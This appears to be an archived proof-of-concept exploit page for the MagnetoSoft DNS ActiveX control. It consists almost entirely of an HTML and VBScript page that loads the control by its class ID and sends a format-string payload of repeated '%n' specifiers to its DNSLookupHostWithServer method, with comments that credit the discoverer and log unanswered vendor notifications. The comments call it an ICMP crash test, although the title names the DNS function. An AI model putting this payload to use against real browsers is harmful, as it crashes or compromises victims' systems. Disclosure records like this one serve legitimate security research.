MagnetoSoft DNS Active-X DNSLookupHostWithServer proof of concept exploit.
3366033f2bd63c437d3c654bacba51bd869865d7e7ee13490df759a5fe5dd70c
<html>
<object classid='clsid:B5ED1577-4576-11D5-851F-00D0B7A934F6' id='target' /></object>
<script language='vbscript'>
'Magneto Software ActiveX Control ICMP Crash POC
'Discovered by: s4squatch
'Site: www.securestate.com
'Date Discovered: 02/11/10
'Vendor Notified: 02/02/10 --> NO RESPONSE
'Vendor Notified: 02/11/10 --> NO RESPONSE
'Vendor Notified: 02/17/10 --> NO RESPONSE
'Published 04/13/10
'www: http://www.magnetosoft.com/products/skdns/skdns_features.htm
'Download: http://www.magnetosoft.com/downloads/skdns_setup.exe
'SKNetResource.ocx
'Function DNSLookupHostWithServer ( ByVal strHostName As String , ByVal strNameServer As String ) As Long
'progid = "SKDNSLib.SKDns"
arg1 = "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"
arg2 = "defaultV"
target.DNSLookupHostWithServer arg1 ,arg2
</script>